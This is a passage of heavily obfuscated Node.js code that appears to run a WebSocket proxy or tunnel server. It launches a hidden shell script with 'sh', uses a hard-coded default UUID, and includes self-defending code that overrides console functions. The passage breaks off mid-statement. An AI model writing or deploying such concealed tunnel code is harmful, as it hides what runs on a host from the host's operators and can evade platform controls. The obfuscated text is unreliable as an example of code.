_0x14b72c(_0x2002d0,_0x478079,_0x1130f9,_0x18b27a,_0x1b644d){return _0x222c(_0x478079-0x209,_0x18b27a);}function _0x37c537(_0x2efe6f,_0x238f13,_0x31cf20,_0x2a8bb6,_0x5266e4){return _0x222c(_0x31cf20- -0x23e,_0x2a8bb6);}function _0x293844(_0xa0d007,_0x1b46b1,_0xb3ba0b,_0x53d00c,_0x1d7c71){return _0x222c(_0xa0d007- -0x23c,_0x1d7c71);}function _0x14a581(_0x1d5669,_0xf09637,_0x2a8cb9,_0x5b7be5,_0x41a08a){return _0x222c(_0xf09637- -0x204,_0x41a08a);}_0x4d4e3e[_0x14b72c(0x410,0x450,0x525,0x481,0x3b3)]=_0x3b3e39(0x57,-0x4e,-0x83,0x86,0x120);const _0x3c0621=_0x4d4e3e;let _0x2c8e2b=!![];return function(_0xa5aa2b,_0x48c4e1){function _0x4d943e(_0xeeed4c,_0x414686,_0x522e28,_0x496173,_0x8f2078){return _0x37c537(_0xeeed4c-0x40,_0x414686-0x107,_0xeeed4c-0x46a,_0x8f2078,_0x8f2078-0xc);}function _0x1df0fa(_0x24afd9,_0x349266,_0x2bfb33,_0x36c3f2,_0x111190){return _0x3b3e39(_0x2bfb33- -0x73,_0x111190,_0x2bfb33-0x11d,_0x36c3f2-0x1d8,_0x111190-0x16d);}function _0x40f4c4(_0x3d6782,_0xfab5c1,_0x373344,_0x2e514d,_0x32a3a5){return _0x14a581(_0x3d6782-0x72,_0x373344-0x9a,_0x373344-0x1e0,_0x2e514d-0x1c1,_0x3d6782);}function _0x1c5e2a(_0x1c04c5,_0x1743bb,_0x549910,_0x808853,_0xd378ef){return _0x3b3e39(_0x549910- -0x14,_0x1743bb,_0x549910-0x137,_0x808853-0xed,_0xd378ef-0x15);}function _0x80c73c(_0x4a154d,_0x52c2dc,_0x1256d1,_0x166334,_0x181a9b){return _0x3b3e39(_0x52c2dc- -0x2e6,_0x181a9b,_0x1256d1-0x1,_0x166334-0x1bb,_0x181a9b-0x51);}if(_0x3c0621[_0x1c5e2a(0x1bd,0x1b3,0x13f,0xd5,0x1ed)](_0x3c0621[_0x1c5e2a(0x3d,0x37,0x40,0xf6,0x13)],_0x3c0621[_0x4d943e(0x473,0x41e,0x4a8,0x473,0x3b9)]))_0x538557[_0x80c73c(-0x1e8,-0x2c4,-0x2e2,-0x280,-0x21b)](_0x40f4c4(0x44,0x8,0x42,0xbd,0x67)+_0x40f4c4(0x14,0x14b,0x76,0x98,0x94)+_0x5ba607);else{const _0x239d7b=_0x2c8e2b?function(){function _0x32ffd3(_0x14ab40,_0x3681ae,_0x1b991b,_0x28db5f,_0x156022){return _0x80c73c(_0x14ab40-0x19,_0x3681ae-0x20b,_0x1b991b-0x8c,_0x28db5f-0x1a2,_0x28db5f);}function _0x3e441e(_0x3000b1,_0x227314,_0x37efd2,_0x1f3652,_0x339a0){return _0x80c73c(_0x3000b1-0x10c,_0x37efd2-0x742,_0x37efd2-0x152,_0x1f3652-0x8d,_0x227314);}const _0x497551={};function _0x483624(_0x35db9a,_0x1ce6f7,_0x35eed5,_0x33ccbe,_0x55ab34){return _0x4d943e(_0x35eed5- -0x52d,_0x1ce6f7-0x1c1,_0x35eed5-0x20,_0x33ccbe-0xcf,_0x33ccbe);}_0x497551[_0x139bc3(0x426,0x3fa,0x334,0x331,0x357)]=_0x3c0621[_0x139bc3(0x25f,0x1e7,0x2de,0x2b6,0x219)];const _0xf80675=_0x497551;function _0x139bc3(_0x3b08e5,_0x4cd9fc,_0x352275,_0x2bf1b8,_0x20700d){return _0x40f4c4(_0x2bf1b8,_0x4cd9fc-0x113,_0x20700d-0x294,_0x2bf1b8-0x1a4,_0x20700d-0x66);}function _0x52ce64(_0x31b8c5,_0x35d946,_0x50fb58,_0x4b9b47,_0x59eb41){return _0x40f4c4(_0x59eb41,_0x35d946-0x91,_0x35d946-0x85,_0x4b9b47-0xf3,_0x59eb41-0x11);}if(_0x3c0621[_0x32ffd3(0x87,0x78,0x5d,0x36,0xe2)](_0x3c0621[_0x483624(-0x210,-0x2f9,-0x273,-0x1a1,-0x30d)],_0x3c0621[_0x483624(-0x66,-0x20a,-0x136,-0x18f,-0xd6)]))return _0x1a6f0a[_0x483624(-0x2c,-0x40,-0xc3,-0x8d,0xd)+_0x483624(-0x2c3,-0x33a,-0x262,-0x194,-0x260)]()[_0x32ffd3(-0xc6,-0xba,-0x84,-0x8f,-0xb8)+'h'](_0xf80675[_0x139bc3(0x3d5,0x34a,0x3bf,0x36e,0x357)])[_0x483624(-0x25,-0xab,-0xc3,-0x16f,-0x160)+_0x3e441e(0x4ac,0x46d,0x479,0x4be,0x564)]()[_0x483624(-0x11d,-0x1bb,-0x15c,-0x11b,-0x146)+_0x3e441e(0x55f,0x3ec,0x49f,0x4f6,0x3af)+'r'](_0x1db1c8)[_0x3e441e(0x4f0,0x537,0x47d,0x403,0x4a9)+'h'](_0xf80675[_0x52ce64(0x66,0x148,0x22a,0x111,0x153)]);else{if(_0x48c4e1){if(_0x3c0621[_0x52ce64(0xd6,0xf0,0x77,0x1a1,0x1a0)](_0x3c0621[_0x139bc3(0x405,0x315,0x428,0x402,0x355)],_0x3c0621[_0x52ce64(0x177,0x146,0x1b6,0x221,0x1b7)])){const _0x162620=_0x48c4e1[_0x139bc3(0x250,0x323,0x336,0x3f8,0x321)](_0xa5aa2b,arguments);return _0x48c4e1=null,_0x162620;}else{const _0x17412e=_0x5eac96?function(){function _0x5db974(_0x2f3515,_0x589995,_0x1375cc,_0x3845b5,_0x364a76){return _0x483624(_0x2f3515-0x22,_0x589995-0x1c0,_0x364a76-0x167,_0x2f3515,_0x364a76-0xdd);}if(_0x36c389){const _0x11534f=_0x1f1891[_0x5db974(-0xe,-0xf,0x11,0x7e,0x5d)](_0x25d17c,arguments);return _0x5d0883=null,_0x11534f;}}:function(){};return _0x14dabb=![],_0x17412e;}}}}:function(){};return _0x2c8e2b=![],_0x239d7b;}};}()),_0x48a700=_0x3e3e80(this,function(){function _0x56a2ea(_0x25b7e4,_0x20d4f7,_0xc142c1,_0x41b6a9,_0x31b32e){return _0x222c(_0x25b7e4- -0x24f,_0x20d4f7);}const _0x35f877={'tyKaX':function(_0x211607){return _0x211607();},'qdEbE':_0x5e1a7a(-0x2b4,-0x278,-0x27e,-0x188,-0x22f)+_0xd2d693(0x2a5,0x2e8,0x37d,0x322,0x310)+_0xd2d693(0x2b0,0x344,0x2db,0x348,0x289)+')','Rpahm':_0xd2d693(0x1ec,0x296,0x130,0x250,0x15b)+_0xd2d693(0x211,0x174,0x1c7,0x263,0x24b)+_0xd2d693(0x122,0x7d,0x1e7,0x10f,0xc9)+_0x5e1a7a(-0x21b,-0x253,-0x267,-0x275,-0x2e0)+_0x5a86c6(-0xc6,-0x80,-0xef,-0x2,-0x7)+_0xd2d693(0x1b4,0x1b1,0x1cc,0x268,0x24c)+_0x1f542c(0x1dc,0x1db,0xac,0x93,0x136),'RUvbo':function(_0x2c953e,_0x4f6b20){return _0x2c953e(_0x4f6b20);},'nnldf':_0x1f542c(0x19f,0x140,0x160,0xb3,0xc1),'gZTRd':function(_0x2a21dd,_0x4016db){return _0x2a21dd+_0x4016db;},'BBKlA':_0x1f542c(0xac,-0x25,0x4f,0x10f,0xa1),'gNvzd':_0x5e1a7a(-0x2e0,-0x253,-0x3a4,-0x39e,-0x2b7),'BfvaY':function(_0x36200e){return _0x36200e();},'GwhBd':function(_0x38f280,_0x14836d){return _0x38f280!==_0x14836d;},'PZViy':_0x5e1a7a(-0x2a1,-0x2fa,-0x1e9,-0x2e1,-0x2c3),'YZnVv':_0x56a2ea(-0x1bd,-0x23e,-0x243,-0x23d,-0x240)+_0x5a86c6(0x157,-0x1f,0x8f,0x1a1,0xb4)+_0xd2d693(0x172,0x1eb,0x23a,0x215,0x142)+_0x5a86c6(-0x137,-0xa9,-0xf0,-0x17f,-0x95),'vycxt':_0x56a2ea(-0x66,-0x12c,0x63,-0xf3,-0x11d)+_0x5a86c6(0xa0,0x47,-0x2d,0x8f,0x5d)+_0xd2d693(0x1b2,0x192,0xd1,0x21a,0x101)+_0x1f542c(0x241,0x20c,0x2cb,0x250,0x20a)+_0x56a2ea(-0x172,-0xe6,-0xa6,-0xfb,-0x1d8)+_0x56a2ea(-0xe6,-0x8,-0x108,-0xa5,-0x1ab)+'\x20)','YuZTU':function(_0x363c43){return _0x363c43();},'EgIjE':function(_0x2fe81a,_0x45475f){return _0x2fe81a===_0x45475f;},'zOvbg':_0x5e1a7a(-0x3d4,-0x25e,-0x3da,-0x388,-0x338),'dBMnj':_0xd2d693(0x1c2,0x27b,0x12b,0x191,0x152),'rdZbx':_0x1f542c(0x19c,0x24,-0x2d,-0x5,0xbd),'FFddC':_0x5a86c6(0x7a,0x40,-0xdf,0x78,-0x38),'MDzGd':_0x1f542c(0x70,0x46,0xa,0x80,0xdd),'hutFS':_0x5e1a7a(-0x25b,-0x418,-0x2e3,-0x3b4,-0x32f),'xuxDF':_0x56a2ea(-0x1b6,-0x237,-0x1ec,-0x144,-0x1d8)+_0x5e1a7a(-0x23a,-0x1f8,-0x266,-0x155,-0x226),'fvPjT':_0x1f542c(0xee,0x76,0x156,-0x7,0xc4),'ArJzO':_0xd2d693(0x225,0x18d,0x1ff,0x21f,0x2ef),'chqdL':function(_0x485508,_0x7d96f9){return _0x485508<_0x7d96f9;},'DlSBX':function(_0x26fcc3,_0x40861){return _0x26fcc3!==_0x40861;},'SeIEh':_0x1f542c(0x1c,0x10,0x184,0x83,0xa2)};let _0x4f7a60;try{if(_0x35f877[_0x56a2ea(-0x9d,-0xf0,-0x2a,0x8,-0x120)](_0x35f877[_0x5a86c6(0xb1,0x3a,0x0,0x42,0x3a)],_0x35f877[_0x56a2ea(-0xa6,-0x186,-0x178,-0x51,-0x2a)]))_0x599484=_0x2d52fb;else{const _0x4b6401=_0x35f877[_0x1f542c(-0x2c,0x44,0xce,0x7,0x9c)](Function,_0x35f877[_0x56a2ea(-0xf0,-0xc2,-0x165,-0x168,-0x3f)](_0x35f877[_0xd2d693(0x1fe,0x29f,0x27d,0x10e,0x218)](_0x35f877[_0x5e1a7a(-0x340,-0x344,-0x328,-0x1c8,-0x270)],_0x35f877[_0x5a86c6(0x33,0x30,-0xe,-0x49,-0x43)]),');'));_0x4f7a60=_0x35f877[_0x1f542c(0x132,0xd0,0x1d7,0x4b,0x10e)](_0x4b6401);}}catch(_0x57388d){_0x35f877[_0x5a86c6(0xae,-0x5c,-0x74,-0x66,0x4d)](_0x35f877[_0x1f542c(0x41,0x15c,0x77,0x1d7,0x12e)],_0x35f877[_0xd2d693(0x13f,0xf0,0x1f9,0x7c,0x16b)])?_0x35f877[_0x5a86c6(-0x61,-0xf2,0x6d,-0x67,-0x75)](_0x39bf25):_0x4f7a60=window;}const _0x3f27fd=_0x4f7a60[_0xd2d693(0x180,0x1d9,0x100,0x1d7,0x23e)+'le']=_0x4f7a60[_0x1f542c(0x126,0x1c0,0x29,0x51,0xe6)+'le']||{};function _0x1f542c(_0x477355,_0xedc545,_0x18d292,_0x5cf9c7,_0x1fa2e0){return _0x222c(_0x1fa2e0-0x5,_0x5cf9c7);}function _0xd2d693(_0x112189,_0x371479,_0x3cfe87,_0x469dc7,_0x3ae34a){return _0x222c(_0x112189-0x9f,_0x3ae34a);}function _0x5e1a7a(_0x81e0ee,_0x1c8f5f,_0x5057d9,_0x44c650,_0x75c638){return _0x222c(_0x75c638- -0x3d3,_0x1c8f5f);}const _0x3e33f8=[_0x35f877[_0xd2d693(0x165,0x15a,0x1aa,0x225,0xb8)],_0x35f877[_0x56a2ea(-0x4b,0x6,-0x138,-0x9,-0x1d)],_0x35f877[_0xd2d693(0x169,0xfc,0x1a4,0xc8,0x13d)],_0x35f877[_0x1f542c(0x309,0x2fa,0x1e6,0x23b,0x226)],_0x35f877[_0x5e1a7a(-0x273,-0x382,-0x247,-0x30a,-0x2d0)],_0x35f877[_0x5a86c6(-0x159,-0x133,-0x7a,-0xfd,-0xdc)],_0x35f877[_0x5a86c6(0x76,-0x43,-0x28,-0x22,-0x45)]];function _0x5a86c6(_0xc87c0a,_0x553564,_0x27b30a,_0x1ac741,_0x20ac17){return _0x222c(_0x20ac17- -0x16f,_0x27b30a);}for(let _0x4cb676=-0x1cec+0x1*0x1b92+0x15a;_0x35f877[_0x1f542c(0xbc,0x146,0x1c1,0x1f2,0x163)](_0x4cb676,_0x3e33f8[_0xd2d693(0x18a,0x17b,0x1e0,0x1a2,0x129)+'h']);_0x4cb676++){if(_0x35f877[_0x56a2ea(-0x10,0x4f,0x81,-0xf0,0x8)](_0x35f877[_0xd2d693(0x206,0x1d2,0x127,0x2bf,0x12f)],_0x35f877[_0x1f542c(0x189,0x1e6,0x121,0x168,0x16c)])){const _0x26189e=new _0x5ed20f(_0x35f877[_0x56a2ea(-0x1e,-0x23,-0x13,-0x5e,0xb9)]),_0x3a302c=new _0x108b02(_0x35f877[_0xd2d693(0x222,0x238,0x1b9,0x276,0x311)],'i'),_0x2709e6=_0x35f877[_0x5e1a7a(-0x2bf,-0x2c0,-0x3be,-0x392,-0x33c)](_0x4664cb,_0x35f877[_0xd2d693(0x2bf,0x332,0x231,0x287,0x20e)]);!_0x26189e[_0x1f542c(0x1a3,0x10e,0x16a,0x102,0x124)](_0x35f877[_0x1f542c(0x1be,0x15c,0x1dc,0x1e1,0x164)](_0x2709e6,_0x35f877[_0x56a2ea(-0xcb,-0xc1,-0x138,-0x123,-0xf4)]))||!_0x3a302c[_0xd2d693(0x1be,0x221,0x273,0x19a,0x239)](_0x35f877[_0x1f542c(0x175,0x213,0xe1,0x79,0x164)](_0x2709e6,_0x35f877[_0x5a86c6(-0x35,-0xe2,-0x18b,-0x18c,-0xc3)]))?_0x35f877[_0x1f542c(0x76,0x7f,0x144,0x136,0x9c)](_0x2709e6,'0'):_0x35f877[_0x56a2ea(-0x88,0x3b,-0x140,0x2a,-0x117)](_0x4be393);}else{const _0x326dd0=_0x3e3e80[_0x1f542c(0x201,0x243,0xcb,0x19a,0x1aa)+_0xd2d693(0x164,0x1b9,0x201,0xb8,0x1bc)+'r'][_0x56a2ea(-0x29,-0xc,-0xe6,0x20,-0xa7)+_0x1f542c(0x102,0x115,0x16b,0x143,0x175)][_0x5e1a7a(-0x28b,-0x290,-0x1e9,-0x25a,-0x288)](_0x3e3e80),_0x30f3d4=_0x3e33f8[_0x4cb676],_0x5cc1dc=_0x3f27fd[_0x30f3d4]||_0x326dd0;_0x326dd0[_0x56a2ea(-0x109,-0xe4,-0x83,-0x142,-0xb4)+_0xd2d693(0x14c,0x174,0xe0,0x1d2,0x1b8)]=_0x3e3e80[_0x1f542c(0x167,0xa3,0x83,0x84,0x150)](_0x3e3e80),_0x326dd0[_0x5e1a7a(-0x11a,-0x1ae,-0x122,-0xd8,-0x195)+_0xd2d693(0x13e,0x165,0x172,0x1f5,0xe2)]=_0x5cc1dc[_0xd2d693(0x2dd,0x27a,0x2f7,0x260,0x391)+_0x1f542c(0xf7,0x49,-0x1f,0x148,0xa4)][_0x5e1a7a(-0x243,-0x2a6,-0x2b2,-0x225,-0x288)](_0x5cc1dc),_0x3f27fd[_0x30f3d4]=_0x326dd0;}}});_0x48a700();const net=require(_0x5b3717(-0xf8,-0x10d,-0x15d,-0x1ae,-0x179)),http=require(_0x5b3717(-0x19a,-0x244,-0x215,-0x13d,-0x182)),{WebSocket,createWebSocketStream}=require('ws'),{TextDecoder}=require(_0x5b3717(-0x2ca,-0x1df,-0x2ca,-0x384,-0x342)),logcb=(..._0xae0cb9)=>console[_0x5b3717(-0x291,-0x205,-0x2e8,-0x261,-0x2d9)][_0x1d31e6(0x126,0x1d7,0x1c1,0xf3,0x51)](this,..._0xae0cb9),errcb=(..._0x25b289)=>console[_0x5b3717(-0x2a5,-0x2ad,-0x22a,-0x2b7,-0x33b)][_0x1e3602(0x4a,0xde,-0xf9,-0xb,-0xbe)](this,..._0x25b289);function _0x1e3602(_0x153873,_0x28ca00,_0x36e8f2,_0x5320bc,_0x498200){return _0x222c(_0x5320bc- -0x156,_0x28ca00);}const {spawn}=require(_0x1e3602(-0x166,-0x68,-0x8d,-0x78,-0x9e)+_0x1d31e6(0x12a,0xa3,0x6a,0xed,0x1b2)+_0x1e3602(-0x9d,-0xa1,0xc,0x22,0x61)),uuid= (process.env.UUID||'56f138a3-a1fd-4f9c-8198-86a3cecba2d7').replace(/-/g, "");port=process[_0x504eae(0x377,0x295,0x2fd,0x41e,0x305)][_0x1d31e6(0x1a9,0x13f,0x199,0x254,0x1c8)]||0x1c25+-0x75b*-0x5+-0x2238,shellFilePath=_0x504eae(0x392,0x36e,0x2e6,0x47c,0x45d)+_0x504eae(0x251,0x310,0x1f0,0x285,0x255),childProcess=spawn('sh',[shellFilePath]),httpServer=http[_0x1e3602(0x5f,0x176,0x1a4,0xb8,0x18f)+_0x5b3717(-0x1a8,-0x18b,-0x1a4,-0x207,-0x21d)+'er']((_0x1227b5,_0x1cbdc7)=>{const _0x1c21f8={'baaVO':_0x7dbfd5(0x434,0x45f,0x2fd,0x401,0x3aa)+_0x7dbfd5(0x3e4,0x33f,0x28d,0x38a,0x360),'cxNks':_0x29d5f9(0x203,0x2e2,0x223,0x236,0x245)+_0x270b17(0x3e7,0x2f6,0x2a7,0x28f,0x32f)+_0x270b17(0x2b3,0x21f,0x14b,0x1a7,0x1b5),'UbKUh':_0x270b17(0x1ce,0x19c,0xcb,0x106,0x136),'VUWbC':function(_0x17d3f3,_0x574243){return _0x17d3f3(_0x574243);},'KBBMA':_0x29d5f9(0x2a5,0x225,0x35c,0x35b,0x1ef),'QRTPc':_0x213bca(0x537,0x4bd,0x4b4,0x579,0x40e),'MbvHf':function(_0x35b46f,_0x58cecc){return _0x35b46f+_0x58cecc;},'CKgNX':function(_0x34a6c2,_0x164544){return _0x34a6c2==_0x164544;},'SSpbY':function(_0x4fa7eb,_0xe732e3){return _0x4fa7eb==_0xe732e3;},'UpZOL':function(_0x8b5df9,_0x548445){return _0x8b5df9+_0x548445;},'FphDo':function(_0xd8db64,_0x53229f){return _0xd8db64==_0x53229f;},'XdJIb':function(_0x1cafcd,_0x2fbc56,_0x5372b3,_0x1fb38a){return _0x1cafcd(_0x2fbc56,_0x5372b3,_0x1fb38a);},'prTxT':_0x7dbfd5(0x2b0,0x305,0x329,0x343,0x38e)+_0x5ec539(-0x125,-0x166,-0x53,-0x10b,-0x98),'bcCTr':function(_0x3b576c,_0x3c6b80,_0x4be179){return _0x3b576c(_0x3c6b80,_0x4be179);},'VJMWX':_0x213bca(0x368,0x44d,0x52f,0x3c1,0x408)+_0x29d5f9(0x299,0x2e3,0x361,0x381,0x22f)+'r:','Ejzpn':_0x29d5f9(0x1a3,0xf9,0x276,0x139,0xb2)+_0x5ec539(-0x155,-0x1eb,-0xb8,-0xc3,-0x104)+_0x5ec539(-0xa5,-0xbf,-0x16c,-0x18c,-0xaf)+_0x213bca(0x3d1,0x4a3,0x486,0x3df,0x4a9)+'ly','NXhPY':_0x7dbfd5(0x404,0x4ce,0x365,0x40c,0x3e0)+'ge','GlnpG':function(_0x4258a8,_0x1bfb99){return _0x4258a8(_0x1bfb99);},'jXxhT':_0x5ec539(-0xbc,-0x60,-0x19d,-0xce,-0x118)+_0x29d5f9(0x190,0x119,0x213,0x1ad,0x1ba)+_0x213bca(0x588,0x58c,0x49f,0x62d,0x4bf)+':','kEbvc':function(_0x20821b,_0x3f0326){return _0x20821b===_0x3f0326;},'VodzB':_0x5ec539(-0xe8,-0x4c,-0xb1,-0x6e,-0x1d0),'xHxer':_0x29d5f9(0x309,0x29f,0x355,0x3d2,0x3c3),'LegjN':function(_0xdbca3,_0x5ce2be){return _0xdbca3!==_0x5ce2be;},'KZCzm':_0x213bca(0x55f,0x573,0x540,0x607,0x5a3),'gHyhj':_0x270b17(0x18a,0x212,0x1cd,0x2ba,0x177),'Yicnh':_0x213bca(0x427,0x4a6,0x4c0,0x41a,0x4e1)+_0x270b17(0x393,0x2bb,0x2ea,0x1db,0x249)};function _0x5ec539(_0x13258a,_0x45ffac,_0x497887,_0x5548cc,_0x57df33){return _0x1e3602(_0x13258a-0x5a,_0x45ffac,_0x497887-0xbe,_0x13258a- -0x1a9,_0x57df33-0x62);}function _0x7dbfd5(_0x5eb884,_0x11000f,_0x4beaea,_0x26afa4,_0xde7a47){return _0x3b9f4f(_0xde7a47-0x3a8,_0x11000f-0x177,_0x4beaea-0x95,_0x26afa4-0x53,_0x5eb884);}function _0x213bca(_0x6ddd31,_0x2b7ad1,_0x5ef674,_0x4f6133,_0x284b61){return _0x504eae(_0x2b7ad1-0x1e4,_0x2b7ad1-0x78,_0x5ef674-0x190,_0x4f6133-0x1e0,_0x4f6133);}function _0x270b17(_0x22ec5c,_0x1daa2e,_0x498e0e,_0x2c5734,_0x24e531){return _0x3b9f4f(_0x1daa2e-0x1f5,_0x1daa2e-0x80,_0x498e0e-0x1f2,_0x2c5734-0x2b,_0x24e531);}function _0x29d5f9(_0x59865f,_0x3256ae,_0x4e1482,_0xaa1c12,_0x5dcc61){return _0x1e3602(_0x59865f-0x38,_0xaa1c12,_0x4e1482-0x110,_0x59865f-0x216,_0x5dcc61-0x1f2);}if(_0x1c21f8[_0x5ec539(-0x19b,-0xdf,-0x228,-0x1b9,-0x133)](_0x1227b5[_0x7dbfd5(0x3f8,0x2bf,0x412,0x437,0x386)],'/')){if(_0x1c21f8[_0x29d5f9(0x224,0x286,0x2aa,0x13a,0x304)](_0x1c21f8[_0x270b17(0x2e7,0x347,0x306,0x27d,0x260)],_0x1c21f8[_0x5ec539(-0x267,-0x2cd,-0x2f7,-0x2d4,-0x192)])){const _0x2b31ae={};_0x2b31ae[_0x29d5f9(0x216,0x171,0x23d,0x1b6,0x19b)+_0x29d5f9(0x16f,0x12d,0x1e5,0x1d5,0x7f)+'pe']=_0x1c21f8[_0x29d5f9(0x2ad,0x365,0x35a,0x1c4,0x226)],_0x473208[_0x7dbfd5(0x453,0x46b,0x481,0x354,0x39f)+_0x213bca(0x45f,0x479,0x561,0x469,0x4ae)](-0x1*-0x1be7+-0x34*-0x28+-0x233f*0x1,_0x2b31ae),_0x5c69a9[_0x213bca(0x519,0x4b2,0x565,0x52d,0x439)](_0x1c21f8[_0x270b17(0x387,0x2da,0x2fe,0x3a6,0x1eb)]);}else{const _0x58c93a={};_0x58c93a[_0x29d5f9(0x216,0x129,0x12c,0x2f9,0x22c)+_0x29d5f9(0x16f,0x143,0x16e,0xa5,0x113)+'pe']=_0x1c21f8[_0x7dbfd5(0x57f,0x423,0x45c,0x46b,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x28d,-0x2ef,-0x266,-0x232)+_0x5ec539(-0x1f0,-0x284,-0x197,-0x1a4,-0x2ba)](-0x1*-0x397+0x1*0x78f+-0x52f*0x2,_0x58c93a),_0x1cbdc7[_0x5ec539(-0x1b7,-0x22e,-0x27d,-0x139,-0x232)](_0x1c21f8[_0x7dbfd5(0x511,0x49e,0x493,0x4f8,0x48d)]);}}else{if(_0x1c21f8[_0x213bca(0x55b,0x51a,0x4e8,0x46c,0x50d)](_0x1c21f8[_0x7dbfd5(0x36f,0x444,0x4b0,0x4aa,0x41f)],_0x1c21f8[_0x7dbfd5(0x370,0x38d,0x438,0x373,0x38b)])){const _0x2c7708={};_0x2c7708[_0x213bca(0x3e4,0x4c0,0x448,0x5ac,0x483)+_0x270b17(0x232,0x1a7,0x281,0x24d,0xf1)+'pe']=_0x1c21f8[_0x7dbfd5(0x515,0x483,0x3b3,0x3ac,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x2e6,-0x2c5,-0x1a5,-0x20e)+_0x29d5f9(0x1cf,0x25b,0x20a,0x28b,0xf0)](0xa06+0x29*0x15+0xbcf*-0x1,_0x2c7708),_0x1cbdc7[_0x29d5f9(0x208,0x2d5,0x287,0x205,0x1ef)](_0x1c21f8[_0x5ec539(-0x142,-0x1a1,-0x8f,-0x197,-0x19d)]);}else{const _0x4a3fcb={'VxtEs':_0x1c21f8[_0x29d5f9(0x260,0x2da,0x1dc,0x223,0x24a)],'YMKao':function(_0x519f95,_0x1c4a82){function _0x10aa16(_0x47b5e4,_0x36b0f2,_0x550907,_0x436a48,_0x152343){return _0x5ec539(_0x47b5e4- -0x69,_0x36b0f2,_0x550907-0x112,_0x436a48-0x14c,_0x152343-0x40);}return _0x1c21f8[_0x10aa16(-0x1ed,-0x1df,-0x238,-0x2b4,-0x158)](_0x519f95,_0x1c4a82);},'iDzSp':_0x1c21f8[_0x213bca(0x504,0x51e,0x5ef,0x5de,0x5e3)],'mhjxL':function(_0x5121b5,_0xcc3f88){function _0x688250(_0x5c854c,_0x305258,_0x75ef46,_0x589ca9,_0x3ab5ab){return _0x213bca(_0x5c854c-0x18d,_0x305258- -0x3f3,_0x75ef46-0x13b,_0x3ab5ab,_0x3ab5ab-0x11b);}return _0x1c21f8[_0x688250(0x1d9,0xf2,0x126,0xe7,0x10b)](_0x5121b5,_0xcc3f88);},'ZcBtI':_0x1c21f8[_0x7dbfd5(0x330,0x340,0x35d,0x47d,0x3cc)],'GXkqo':function(_0x2a18c9,_0xf462c3){function _0x157cba(_0x411230,_0x4128a7,_0x4e1812,_0x49cfa7,_0x52cb71){return _0x5ec539(_0x4e1812-0x41b,_0x52cb71,_0x4e1812-0x194,_0x49cfa7-0x99,_0x52cb71-0xa2);}return _0x1c21f8[_0x157cba(0x18a,0x203,0x242,0x160,0x224)](_0x2a18c9,_0xf462c3);},'liHXh':function(_0x1a6491,_0x223a64){function _0x4aaa51(_0x4b7a2d,_0x54fb91,_0x4a9a1d,_0x53bd9a,_0xdc3b1e){return _0x213bca(_0x4b7a2d-0xd4,_0x4b7a2d- -0x570,_0x4a9a1d-0xc7,_0x54fb91,_0xdc3b1e-0xa6);}return _0x1c21f8[_0x4aaa51(-0x47,-0xf3,-0x9b,0x2b,-0xd3)](_0x1a6491,_0x223a64);},'BDovH':function(_0x9244af,_0x3db7ab){function _0x268979(_0x468383,_0x5bccfc,_0x37de67,_0x5b5ca1,_0x3e78cc){return _0x7dbfd5(_0x468383,_0x5bccfc-0xdd,_0x37de67-0x147,_0x5b5ca1-0xdb,_0x5b5ca1- -0x77);}return _0x1c21f8[_0x268979(0x3f3,0x3cb,0x3ab,0x424,0x3fc)](_0x9244af,_0x3db7ab);},'fBjQe':function(_0x4f6420,_0x3470f7){function _0x26bc63(_0x433001,_0x5f4de1,_0x317a3f,_0x5cc401,_0x5c6180){return _0x213bca(_0x433001-0x78,_0x317a3f- -0x4da,_0x317a3f-0x16a,_0x5c6180,_0x5c6180-0xee);}return _0x1c21f8[_0x26bc63(-0xde,-0x139,-0x4a,0x33,-0xa4)](_0x4f6420,_0x3470f7);},'IGTuh':function(_0x39e827,_0x288a81){function _0x363714(_0x1014a3,_0x42303a,_0x2335b8,_0x3bc845,_0x360e7f){return _0x29d5f9(_0x2335b8- -0x3db,_0x42303a-0x135,_0x2335b8-0x1b8,_0x1014a3,_0x360e7f-0x16e);}return _0x1c21f8[_0x363714(-0x146,-0x1c3,-0x1f5,-0x271,-0x156)](_0x39e827,_0x288a81);},'NLVqL':function(_0x39be05,_0x356769){function _0x3c96ea(_0x1348fb,_0x20fd17,_0x1d89e3,_0x40098e,_0xb5dac4){return _0x5ec539(_0x1d89e3-0x33,_0xb5dac4,_0x1d89e3-0x73,_0x40098e-0x1e9,_0xb5dac4-0xe3);}return _0x1c21f8[_0x3c96ea(0xe,-0xfc,-0x95,-0xd1,-0x28)](_0x39be05,_0x356769);},'fofzi':function(_0x3cc423,_0x3786db){function _0x369d35(_0x1379ad,_0x52aaa2,_0x5e4c0b,_0x39aad5,_0x1c563b){return _0x270b17(_0x1379ad-0xd6,_0x1c563b- -0x3a1,_0x5e4c0b-0xb0,_0x39aad5-0xe9,_0x1379ad);}return _0x1c21f8[_0x369d35(0x6d,-0x78,-0xfc,-0x122,-0x76)](_0x3cc423,_0x3786db);},'QmRQu':function(_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e){function _0x2b9cad(_0x3a8b36,_0x5f5aaa,_0x50e1cf,_0x305157,_0x4f0d4e){return _0x270b17(_0x3a8b36-0x3f,_0x50e1cf- -0x352,_0x50e1cf-0x82,_0x305157-0x10e,_0x3a8b36);}return _0x1c21f8[_0x2b9cad(-0x23e,-0x1fc,-0x1d8,-0x2bb,-0x2c4)](_0x2fa855,_0x4a162c,_0xa7adbb,_0x38795e);},'GwelD':_0x1c21f8[_0x7dbfd5(0x40f,0x4b8,0x495,0x3bd,0x429)],'tamNE':function(_0x9cc4ff,_0x3b60d4,_0x3b647e){function _0x5061c8(_0x4cecf0,_0x5a8a4a,_0x3060f3,_0x59c5cc,_0x35c7aa){return _0x213bca(_0x4cecf0-0x180,_0x3060f3- -0x5e8,_0x3060f3-0xe8,_0x59c5cc,_0x35c7aa-0x2b);}return _0x1c21f8[_0x5061c8(-0xa2,-0xac,-0xf0,-0xc1,-0xe7)](_0x9cc4ff,_0x3b60d4,_0x3b647e);},'rvbRb':_0x1c21f8[_0x7dbfd5(0x4df,0x54d,0x3f8,0x568,0x499)]};_0x5a5af8[_0x7dbfd5(0x275,0x311,0x272,0x431,0x363)](_0x1c21f8[_0x5ec539(-0x165,-0x95,-0xd7,-0x82,-0xe2)]),_0x138eef[_0x7dbfd5(0x40c,0x2bc,0x24f,0x29d,0x335)](_0x1c21f8[_0x29d5f9(0x1de,0xf0,0x132,0x17d,0x259)],_0x455e6d=>{const 